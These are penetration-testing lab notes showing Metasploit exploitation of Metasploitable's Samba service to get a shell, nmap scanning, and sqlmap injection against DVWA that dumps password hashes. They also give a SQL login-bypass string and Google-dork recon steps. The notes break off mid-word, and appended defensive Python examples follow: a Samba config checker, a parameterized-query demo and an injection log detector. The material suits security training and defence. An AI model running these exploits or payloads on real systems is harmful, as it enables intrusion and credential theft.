Penetration Testing Training

March 13, Day 1: summary of the main labs

First, the Struts2 vulnerability was used to execute arbitrary commands directly and take control of the host.

Lab environment: Kali Linux as the attack machine; OWASP, 2003 and Metasploitable as the target machines, all reachable from the attacker. (Addresses in these notes survive only as their last octet, for example 54, 28 and 29.)

Use Metasploit to attack the target's Samba service and obtain a shell:

    search samba                        find the module
    use multi/samba/usermap_script      select the exploit module
    show payloads                       list the payloads compatible with this exploit module
    set payload cmd/unix/bind_netcat    use netcat to run a shell once the exploit succeeds
    show options                        show the parameters that need to be set
    set RHOST 54                        set the host to attack
    exploit                             launch the attack

1. Install the VM software, start Kali, OWASP and Metasploitable, and set up the environment so that the machines can reach each other; the network is configured in NAT mode with the address range /24.

2. Start the Kali VM, switch to root, enter msfconsole and change the initial password to 123456:

    msf > passwd
    [*] exec: passwd

    输入新的 UNIX 密码:
    重新输入新的 UNIX 密码:
    passwd:已成功更新密码

Then look for the Samba modules:

    msf > search samba

    Matching Modules
    ================

       Name                                            Disclosure Date  Rank       Description
       ----                                            ---------------  ----       -----------
       auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
       auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
       auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
       auxiliary/dos/samba/read_nttrans_ea_list                         normal     Samba read_nttrans_ea_list Integer Overflow
       exploit/freebsd/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (*BSD x86)
       exploit/linux/samba/chain_reply                 2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
       exploit/linux/samba/lsa_transnames_heap         2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
       exploit/linux/samba/setinfopolicy_heap          2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
       exploit/linux/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Linux x86)
       exploit/multi/samba/nttrans                     2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
       exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution
       exploit/osx/samba/lsa_transnames_heap           2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
       exploit/osx/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
       exploit/solaris/samba/lsa_transnames_heap       2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
       exploit/solaris/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
       exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution
       exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Execution
       exploit/windows/http/sambar6_search_results     2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
       exploit/windows/license/calicclnt_getconfig     2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
       post/linux/gather/enum_configs                                   normal     Linux Gather Configurations

Select the exploit module and list the payloads compatible with it:

    msf > use multi/samba/usermap_script
    msf exploit(usermap_script) > show payloads

    Compatible Payloads
    ===================

       Name                              Disclosure Date  Rank    Description
       ----                              ---------------  ----    -----------
       cmd/unix/bind_awk                                  normal  Unix Command Shell, Bind TCP (via AWK)
       cmd/unix/bind_inetd                                normal  Unix Command Shell, Bind TCP (inetd)
       cmd/unix/bind_lua                                  normal  Unix Command Shell, Bind TCP (via Lua)
       cmd/unix/bind_netcat                               normal  Unix Command Shell, Bind TCP (via netcat)
       cmd/unix/bind_netcat_gaping                        normal  Unix Command Shell, Bind TCP (via netcat -e)
       cmd/unix/bind_netcat_gaping_ipv6                   normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
       cmd/unix/bind_perl                                 normal  Unix Command Shell, Bind TCP (via Perl)
       cmd/unix/bind_perl_ipv6                            normal  Unix Command Shell, Bind TCP (via perl) IPv6
       cmd/unix/bind_ruby                                 normal  Unix Command Shell, Bind TCP (via Ruby)
       cmd/unix/bind_ruby_ipv6                            normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
       cmd/unix/bind_zsh                                  normal  Unix Command Shell, Bind TCP (via Zsh)
       cmd/unix/generic                                   normal  Unix Command, Generic Command Execution
       cmd/unix/reverse                                   normal  Unix Command Shell, Double Reverse TCP (telnet)
       cmd/unix/reverse_awk                               normal  Unix Command Shell, Reverse TCP (via AWK)
       cmd/unix/reverse_lua                               normal  Unix Command Shell, Reverse TCP (via Lua)
       cmd/unix/reverse_netcat                            normal  Unix Command Shell, Reverse TCP (via netcat)
       cmd/unix/reverse_netcat_gaping                     normal  Unix Command Shell, Reverse TCP (via netcat -e)
       cmd/unix/reverse_openssl                           normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
       cmd/unix/reverse_perl                              normal  Unix Command Shell, Reverse TCP (via Perl)
       cmd/unix/reverse_perl_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via perl)
       cmd/unix/reverse_php_ssl                           normal  Unix Command Shell, Reverse TCP SSL (via php)
       cmd/unix/reverse_python                            normal  Unix Command Shell, Reverse TCP (via Python)
       cmd/unix/reverse_python_ssl                        normal  Unix Command Shell, Reverse TCP SSL (via python)
       cmd/unix/reverse_ruby                              normal  Unix Command Shell, Reverse TCP (via Ruby)
       cmd/unix/reverse_ruby_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
       cmd/unix/reverse_ssl_double_telnet                 normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
       cmd/unix/reverse_zsh                               normal  Unix Command Shell, Reverse TCP (via Zsh)

Choose netcat to run a shell after the exploit succeeds, check the options, set the target and launch:

    msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
    payload => cmd/unix/bind_netcat
    msf exploit(usermap_script) > show options
    msf exploit(usermap_script) > set RHOST 54
    RHOST => 54
    msf exploit(usermap_script) > exploit

    [*] Started bind handler
    [*] Command shell session 1 opened (28:56558 -> 54:4444) at 2015-03-13 16:06:40 +0800

Control of host 54 has been obtained, so a user can be added:

    useradd test

The user was added successfully.

Host discovery:

    -PU -sn                                      UDP ping, no service listing
    -Pn                                          do not ping first
    nmap -sS -Pn xx.xx.xx.xx                     TCP SYN scan without sending ICMP
    nmap -sV -Pn xx.xx.xx.xx                     list service version details
    nmap -PO --script=smb-check-vulns xx.xx.xx.xx   check for the MS08-067 vulnerability

nmap scan of the web host, run from inside msfconsole:

    msf > nmap -sV -Pn 54
    [*] exec: nmap -sV -Pn 54

    Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CST
    Nmap scan report for 54
    Host is up (0.00020s latency).
    All 1000 scanned ports on 54 are filtered
    MAC Address: 00:50:56:E7:1B:31 (VMware)

    Service detection performed. Please report any incorrect results at /submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

    msf > nmap -PO --script=smb-check-vulns 54
    [*] exec: nmap -PO --script=smb-check-vulns 54

    Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CST
    Nmap scan report for 54
    Host is up (0.00021s latency).
    All 1000 scanned ports on 54 are filtered
    MAC Address: 00:50:56:E7:1B:31 (VMware)

    Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds

    msf > nmap -O
    [*] exec: nmap -O

    Starting Nmap 6.46 ( ) at 2015-03-13 17:16 CST
    Nmap scan report for (32)
    Host is up (0.0054s latency).
    Not shown: 999 filtered ports
    PORT   STATE SERVICE
    80/tcp open  http
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)
    No exact OS matches for host (test conditions non-ideal).

    OS detection performed. Please report any incorrect results at /submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds

Directory scan with the Metasploit auxiliary module:

    msf > use auxiliary/scanner/http/dir_scanner
    msf auxiliary(dir_scanner) > set THREADS 50
    THREADS => 50
    msf auxiliary(dir_scanner) > set RHOSTS
    RHOSTS =>
    msf auxiliary(dir_scanner) > run

    [*] Detecting error code
    [*] Detecting error code
    [*] Scanned 2 of 2 hosts (100% complete)
    [*] Auxiliary module execution completed

sqlmap: checking for SQL injection vulnerabilities

    root@kali:~# sqlmap
    root@kali:~# sqlmap -u "29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23"

Passing the session cookie lets sqlmap find the site's database users and passwords:

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 11:50:20

    [11:50:20] [INFO] testing connection to the target URL
    [11:50:20] [INFO] testing if the target URL is stable. This can take a couple of seconds
    [11:50:21] [INFO] target URL is stable
    [11:50:21] [INFO] testing if GET parameter 'id' is dynamic
    [11:50:21] [INFO] confirming that GET parameter 'id' is dynamic
    [11:50:21] [INFO] GET parameter 'id' is dynamic
    [11:50:21] [INFO] heuristics detected web page charset 'ascii'
    [11:50:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    [11:50:21] [INFO] testing for SQL injection on GET parameter 'id'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
    do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
    [11:50:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [11:50:25] [WARNING] reflective value(s) found and filtering out
    [11:50:25] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [11:50:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [11:50:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
    [11:50:25] [INFO] testing 'MySQL inline queries'
    [11:50:25] [INFO] testing 'MySQL >= 5.0.11 stacked queries'
    [11:50:25] [WARNING] time-based comparison requires larger statistical model, please wait.
    [11:50:25] [INFO] testing 'MySQL >= 5.0.11 AND time-based blind'
    [11:50:36] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.11 AND time-based blind' injectable
    [11:50:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [11:50:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [11:50:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [11:50:36] [INFO] target URL appears to have 2 columns in query
    [11:50:36] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
    sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 4334=4334 AND 'iasX'='iasX&Submit=Submit

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1' AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END)),0x7163716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zAHU'='zAHU&Submit=Submit

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626e6f71,0x4b497150534967787451,0x7163716271)#&Submit=Submit

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.11 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'xfNp'='xfNp&Submit=Submit
    ---
    [11:50:40] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [11:50:40] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/29'

    [*] shutting down at 11:50:40

List the databases:

    root@kali:~# sqlmap -u "29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id --dbs

The databases returned are:

    [11:53:32] [WARNING] reflective value(s) found and filtering out
    available databases [2]:
    [*] dvwa
    [*] information_schema

Look at the dvwa database:

    root@kali:~# sqlmap -u "29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa --tables

    Database: dvwa
    [2 tables]
    +-----------+
    | guestbook |
    | users     |
    +-----------+

    root@kali:~# sqlmap -u "29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users --columns

    Database: dvwa
    Table: users
    [6 columns]
    +------------+-------------+
    | Column     | Type        |
    +------------+-------------+
    | user       | varchar(15) |
    | avatar     | varchar(70) |
    | first_name | varchar(15) |
    | last_name  | varchar(15) |
    | password   | varchar(32) |
    | user_id    | int(6)      |
    +------------+-------------+

    root@kali:~# sqlmap -u "29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users -C user,password --dump

    Database: dvwa
    Table: users
    [5 entries]
    +---------+--------------------------------------------+
    | user    | password                                   |
    +---------+--------------------------------------------+
    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
    | admin   | 21232f297a57a5a743894a0e4a801fc3 (admin)   |
    | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)  |
    | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7           |
    | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99           |
    +---------+--------------------------------------------+

The username is admin and the password is admin. Success.

Day 2: Information gathering

whois: domain registration lookup. Target:

Netcraft site report: hosting provider, site rank and operating system of a website: T/site_report?url=

Side-site technique: if the main site is clean, look at the other websites on the same server. IP-to-domain reverse lookup site: /reverse_ip

1. Google: /google-dorks

2. Directory structure: parent directory site:/XXXX (inc: site configuration, database credentials, etc.; bak: backup files; txt or sql: data structures, etc.)

    use auxiliary/scanner/http/dir_scanner
    set THREADS 50        set the number of threads
    set RHOSTS XXXX       set the target
    run                   (or exploit) once the options are set

robots.txt tells search engines which directories hold sensitive files.

3. Search for files of a specific type: site:XXXX filetype:xls

4. Search for pages likely to contain SQL injection points: site:XXX inurl:login

On the login page, append a single quote to an arbitrary username to trigger a database error; the error reveals the shape of the query:

    select * from users where username='xx' and password='xx'

Entering admin' OR 1 (or admin' or 1) as the username turns it into:

    select * from users where username='admin' or 1=1-- ...

With admin' or 1=1-- as the username, the password can be any number.

Adding a single quote to a parameter on a page: if injection exists, a database error appears; otherwise the page does not change. Another way is to append and 1=1 or and 1=2, both of which produce an error; 'a'='a works as well. admin' or 1=1-- gets you in.

sqlmap usage pattern:

    sqlmap -u "29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
    sqlmap -u http:/
    root@kali:~# sqlmap
    sqlmap -u <url> --cookie=<cookie> -p id -D <database> -T <table>

Host discovery and port scanning

Active host scan:

    use auxiliary/scanner/discovery/arp_sweep
    set RHOSTS 2-130
    set THREADS 50
    run

2. nmap

Service scanning and enumeration:

1. Metasploit's scanner auxiliary modules include many tools for service scanning and enumeration, usually named <service name>_login or <service name>_version: search name:version

2. SSH enumeration:

    use auxiliary/scanner/ssh/ssh_version
    set RHOSTS xxxx
    set THREADS 100
    run

SSH enumeration lab:

    root@kali:~# msfconsole
    msf > use auxiliary/scanner/ssh/ssh_version
    msf auxiliary(ssh_version) > show options

    Module options (auxi
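The usermap_script exploit in the Day 1 lab works because affected Samba builds handed the client-supplied username to the shell through the "username map script" directive; the quickest host-side check is whether that directive is set at all. The following checker is an added example, not part of the training notes; the smb.conf fragment is constructed, and matching ignores case and whitespace the way Samba's own parameter lookup does.

```python
import re

# Constructed smb.conf fragment (not from the page). One active
# "username map script" line, one commented out that must be ignored.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba Server
   username map script = /etc/samba/scripts/mapusers.sh
   # username map script = /tmp/disabled.sh

[homes]
   browseable = no
   writable = yes

[printers]
   path = /var/spool/samba
"""

def parse_smb_conf(text):
    """Parse smb.conf text into {section: {normalized_key: value}}.
    Keys are lower-cased with all whitespace removed, mirroring Samba's
    case- and whitespace-insensitive parameter matching."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":       # blank line or comment
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:                                  # new [section]
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections

def find_username_map_script(text):
    """Return [(section, script_path)] for every active 'username map script'."""
    hits = []
    for section, params in parse_smb_conf(text).items():
        value = params.get("usernamemapscript")
        if value:
            hits.append((section, value))
    return hits

if __name__ == "__main__":
    for section, script in find_username_map_script(SAMPLE_SMB_CONF):
        print(f"[{section}] username map script = {script}")
```

A hit means the directive is live on that host; removing it (or upgrading Samba past the affected builds) is the fix, and the mapped script itself deserves review for how it treats its argument.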
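The Day 2 notes recover the login query by appending a quote and then bypass it with admin' or 1=1--. The following added example (not from the notes, not DVWA's code) reproduces that query shape against an in-memory SQLite table with the same MD5-hashed password column the dump above shows, and places the parameterized version beside it so the same input can be compared; the user rows are constructed.

```python
import hashlib
import sqlite3

def make_db():
    """In-memory users table shaped like the dumped dvwa.users table.
    Rows are constructed; MD5 mirrors how DVWA stores passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    for user, pw in [("admin", "admin"), ("gordonb", "abc123")]:
        conn.execute("INSERT INTO users VALUES (?, ?)",
                     (user, hashlib.md5(pw.encode()).hexdigest()))
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """String-built query: the shape the stray-quote probe reveals."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT user FROM users WHERE user='" + username
           + "' AND password='" + pw_hash + "'")
    return sorted(row[0] for row in conn.execute(sql))

def login_parameterized(conn, username, password):
    """Same logic with bound parameters: the quote stays data, not SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT user FROM users WHERE user=? AND password=?"
    return sorted(row[0] for row in conn.execute(sql, (username, pw_hash)))

def errors_on_input(conn, username, password):
    """True if the string-built query fails to parse for this input,
    i.e. the 'append a quote and watch for an error' signal from the notes."""
    try:
        login_vulnerable(conn, username, password)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    bypass = "admin' or 1=1--"
    print("quote probe errors:", errors_on_input(db, "admin'", "x"))
    print("vulnerable:", login_vulnerable(db, bypass, "1"))     # every user
    print("parameterized:", login_parameterized(db, bypass, "1"))  # nobody
```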
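From the defender's side, the four sqlmap techniques that hit the DVWA id parameter above (boolean-based, error-based, UNION and time-based) each leave a recognisable shape in the web server's access log. This added scanner is not from the notes; the signatures follow the payload shapes sqlmap printed above, the log lines are constructed Apache combined-format entries, and IPs are TEST-NET placeholders.

```python
import re
from urllib.parse import unquote_plus

# Signature per technique seen in the sqlmap output above, plus the bare
# quote probe ("id=1'") that starts each one. Matched on the decoded path.
SIGNATURES = {
    "boolean_blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    "error_based":   re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|INFORMATION_SCHEMA", re.I),
    "union":         re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "time_based":    re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "quote_probe":   re.compile(r"=\d+'(\s|&|$)"),
}

# Apache combined format: ip ident user [ts] "METHOD path PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed log lines (not from the page); the first three mirror the
# boolean, UNION and time-based payloads sqlmap reported, URL-encoded.
SAMPLE_LOG = [
    '192.0.2.28 - - [13/Mar/2015:11:50:25 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%204334%3D4334%20AND%20%27iasX%27%3D%27iasX&Submit=Submit HTTP/1.1" 200 4821',
    '192.0.2.28 - - [13/Mar/2015:11:50:36 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x71626e6f71%2C0x4b497150534967787451%2C0x7163716271%29%23&Submit=Submit HTTP/1.1" 200 4905',
    '192.0.2.28 - - [13/Mar/2015:11:50:36 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29%20AND%20%27xfNp%27%3D%27xfNp&Submit=Submit HTTP/1.1" 200 4821',
    '192.0.2.5 - - [13/Mar/2015:11:52:01 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4821',
    '192.0.2.5 - - [13/Mar/2015:11:52:09 +0800] "GET /dvwa/login.php HTTP/1.1" 200 1224',
]

def classify(path):
    """Names of the injection techniques whose signature appears in the path."""
    decoded = unquote_plus(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_access_log(lines):
    """Return [(ip, timestamp, [techniques])] for every request that matches."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue                      # skip lines in another format
        techniques = classify(m.group("path"))
        if techniques:
            hits.append((m.group("ip"), m.group("ts"), techniques))
    return hits

if __name__ == "__main__":
    for ip, ts, techniques in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {ts} {','.join(techniques)}")
```

Three matching requests from one source within seconds, each with a different technique, is the burst pattern sqlmap's default run produces; a single quote_probe alone is worth a look but is also what a careless user typing O'Brien looks like.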